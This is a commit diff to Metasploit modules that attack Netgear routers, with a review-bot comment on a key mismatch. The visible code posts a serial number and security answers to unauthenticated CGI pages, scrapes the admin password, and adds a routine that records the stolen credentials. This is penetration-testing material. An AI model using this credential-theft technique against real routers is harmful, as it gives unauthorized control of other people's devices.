made changes suggested

bug/bundler_fix
Pedro Ribeiro 2017-01-04 23:02:10 +00:00
parent 9d3e90e8e5
commit d95a3ff2ac
2 changed files with 53 additions and 25 deletions


@ -96,31 +96,31 @@ class MetasploitModule < Msf::Auxiliary
end end
# 1: send serial number # 1: send serial number
res = send_request_cgi({ send_request_cgi({
'uri' => '/apply_noauth.cgi?/unauth.cgi', 'uri' => '/apply_noauth.cgi?/unauth.cgi',
'method' => 'POST', 'method' => 'POST',
'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Type' => 'application/x-www-form-urlencoded',
'vars_post' => 'vars_post' =>
{ {
'submit_flag' => 'match_sn', 'submit_flag' => 'match_sn',
'serial_num' => serial, 'serial_num' => serial,
'continue' => '+Continue+' 'continue' => '+Continue+'
} }
}) })
# 2: send answer to secret questions # 2: send answer to secret questions
res = send_request_cgi({ send_request_cgi({
'uri' => '/apply_noauth.cgi?/securityquestions.cgi', 'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
'method' => 'POST', 'method' => 'POST',
'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Type' => 'application/x-www-form-urlencoded',
'vars_post' => 'vars_post' =>
{ {
'submit_flag' => 'security_question', 'submit_flag' => 'security_question',
'answer1' => @q1, 'answer1' => @q1,
'answer2' => @q2, 'answer2' => @q2,
'continue' => '+Continue+' 'continue' => '+Continue+'
} }
}) })
# 3: PROFIT!!! # 3: PROFIT!!!
res = send_request_cgi({ res = send_request_cgi({
@ -130,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
if res && res.body =~ /Admin Password: (.*)<\/TD>/ if res && res.body =~ /Admin Password: (.*)<\/TD>/
password = $1 password = $1
if password.nil? or password == "" if password.blank?
fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?") fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")
end end
else else
@ -145,6 +145,33 @@ class MetasploitModule < Msf::Auxiliary
return [username, password] return [username, password]
end end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'netgear',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def send_req(timestamp) def send_req(timestamp)
begin begin
@ -211,6 +238,7 @@ class MetasploitModule < Msf::Auxiliary
if res && res.code == 200 if res && res.code == 200
credentials = get_creds credentials = get_creds
print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"") print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
report_cred({ 'user' => credentials[0], 'password' => credentials[1] })
return return
end end
end end
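Review bot: The added call `report_cred({ 'user' => credentials[0], 'password' => credentials[1] })` passes string keys, but the new `report_cred` reads `opts[:user]`, `opts[:password]`, `opts[:ip]`, `opts[:port]` and `opts[:proof]`, so every lookup returns nil. As written, the stored record has no address, port, username or secret, and what `create_credential` does with those nil values is not visible here. Use symbol keys and supply the service address, for example `report_cred(ip: rhost, port: rport, user: credentials[0], password: credentials[1])`, assuming the usual `rhost`/`rport` helpers are in scope in this module. The method containing the call starts and ends outside the hunk, so confirm those names against the full file.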


@ -214,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
# no shell? let's just go on and bruteforce the timestamp # no shell? let's just go on and bruteforce the timestamp
# 3: get the current date from the router and parse it # 3: get the current date from the router and parse it
end_time = get_current_time end_time = get_current_time
if end_time == nil if end_time.nil?
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time") fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
end end
if end_time <= datastore['TIME_OFFSET'] if end_time <= datastore['TIME_OFFSET']